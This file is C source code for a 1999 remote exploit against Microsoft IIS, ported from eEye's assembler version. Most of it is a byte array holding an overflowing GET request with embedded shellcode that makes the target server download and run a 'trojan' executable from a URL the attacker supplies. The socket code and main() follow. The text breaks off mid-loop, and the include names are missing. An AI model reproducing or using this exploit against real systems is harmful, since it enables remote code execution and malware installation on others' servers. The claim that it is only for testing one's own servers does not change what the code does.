/* to compile on solaris: change u_int32_t to uint32_t and type:
gcc -o iishack iishack.c -lnsl -lsocket -lresolv */
/***********************************************************/
/* IIS Exploit for Linux (c) 1999 Ultima */
/* ultima@snicker.emoti.com */
/* The original exploit as published by EEye was written */
/* in assembler, and is rather unportable. I wrote it in */
/* C, and it should compile and run on just about anything.*/
/* */
/* THIS IS ONLY FOR TESTING YOUR OWN SERVERS FOR THE */
/* VULNERABILITY. BY RUNNING THIS PROGRAM YOU ASSUME */
/* ALL LIABILITY FOR ANY AND ALL RESULTS CAUSED BY */
/* THIS PROGRAM, WHETHER DIRECT OR INDIRECT. IN NO CASE */
/* SHALL ULTIMA BE HELD RESPONSIBLE. */
/* */
/* Released: 6.16.1999 (Y2K Compliant!! =) */
/* */
/* This code is released under the terms of the LGPL */
/* Version 2 or later, at your discretion. */
/* */
/* The uninitialized egg was evolved from reverse- */
/* engineering the EEye exploit, and was injected into */
/* C. This is basically the same poison, with a different */
/* needle. Thanks to drkspyrit and the EEyes ppl,without */
/* which, this code would have not existed. */
/* He can be reached as barns@eeye.com. */
/* The eEye website is http://www.eEye.com */
/* Usage: ./iishack */
/* The trojan is an http url (minus the http://) of a */
/* program you want to run on the server. Server and port */
/* are self-explanitory. */
/* Compiling: cc -o iishack iishack.c */
/* Example: */
/* ./iishack www.notthere.com 80 www.myisp.com/exploit.exe */
/***********************************************************/
#include
#include
#include
#include
#include
#include
#include
#define egglen 1157
#define urloff 1055
unsigned char egg[] = {
71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88,
88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216,
50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208,
16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6,
144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82,
81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215,
80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90,
51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88,
117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230,
51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80,
80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33,
144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50,
192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12,
139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119,
204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132,
192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128,
128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91,
139, 208, 102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88,
144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80,
82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85,
255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220,
51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115,
111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141,
152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141,
144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144,
131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83,
33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134,
149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148,
149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49,
46, 48, 13, 10, 13, 10, 10 };
u_int32_t resolve(char *host) /* for solaris, try uint32_t */
{
struct hostent *he;
long n = inet_addr(host);
if(n!=-1)
return(n);
he = gethostbyname(host);
if(!he)
{
herror("gethostbyname");
return(0);
}
memcpy(&n, he->h_addr, 4);
return(*(long *)he->h_addr_list[0]);
}
int main(int argc, char **argv)
{
char *server;
int port;
char *url;
int fd;
struct sockaddr_in s_in;
int i=0,x,j=0;
int first=0;
if(argc != 4)
{
fprintf(stderr, "usage: %s \n", argv[0]);
exit(1);
}
server = argv[1];
port = atoi(argv[2]);
url = argv[3];
if(strlen(url) > 85)
{
fprintf(stderr, "Trojan name must be less than 85 characters.\n");
exit(1);
}
for(x=0;x